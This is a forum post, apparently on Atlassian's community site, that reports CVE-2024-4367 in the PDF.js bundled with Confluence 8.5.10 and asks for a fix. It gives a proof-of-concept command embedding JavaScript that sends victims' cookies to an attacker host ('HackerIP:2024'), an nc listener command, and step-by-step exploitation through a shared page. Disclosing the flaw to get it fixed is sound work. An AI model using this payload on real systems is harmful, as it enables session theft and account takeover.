[SEC] Confluence CVE-2024-4367 security issue
We found CVE-2024-4367 in confluence version 8.5.10 and did not find an official way to deal with this vulnerability? How to make an effective fix?
Vulnerability Overview
In Confluence version 8.5.10, PDF.JS is referenced for loading and parsing PDF files. However, a previous vulnerability, CVE-2024-4367, exists in the PDF.JS plugin, affecting versions <= 4.1.392. It was discovered through testing that the version of PDF.JS used in Confluence 8.5.10 is also affected by this vulnerability.
An attacker can exploit this vulnerability by uploading a malicious PDF file. When the victim previews or opens this file, the malicious JavaScript code is automatically executed, leading to remote code execution (RCE) or theft of the victim's cookies. This could further allow the attacker to take control of the victim's system, steal sensitive information, bypass authentication mechanisms, and directly access the victim's account.
Reference links for CVE-2024-4367:
Since I could not find information about this vulnerability on your official website, https://www.atlassian.com/trust/data-protection/vulnerabilities, I attempted to disable the preview function in the background as an administrator but failed.
Following a solution from your official forum, modifying specific database table fields to disable the preview function is practically unfeasible.
I hope you can assist me in resolving this issue.
Vulnerability Steps
Using the tool https://github.com/LOURC0D3/CVE-2024-4367-PoC, I constructed a malicious PDF file that, when parsed by PDF.JS, automatically sends the victim's cookies to the attacker's server.
Attack Command
The following Python script is used to construct the malicious PDF file(I use this command to steal users' cookies):
Python:
CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"
------
Steps to Exploit the Vulnerability
- Create a Page
Create a blank page in Confluence.
- Insert Malicious PDF Insert the generated malicious PDF file into the page.
- Victim Previews the File When the victim opens or previews the malicious PDF file, the malicious code is triggered.
- Attacker Listens on Port The attacker uses the following command to listen on the server port to capture the cookies: nc -lvp 2024
- Capture Victim's Cookies The attacker receives the victim's cookies on the server.
- Use Cookies The attacker can use the stolen cookies to log into the victim's account without entering a username and password, leading to identity theft and sensitive data leakage. Since the page can be shared, any user can access the PDF, allowing us to steal cookies from any user.
- Remote Code Execution (RCE) By further exploiting this vulnerability, the attacker can achieve remote code execution, leading to more severe system damage.
Conclusion
This vulnerability can lead to serious consequences, including remote code execution, data theft, and identity theft.
How can this issue be addressed effectively?
1 answer
1 accepted
Saurabh Bhatia
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.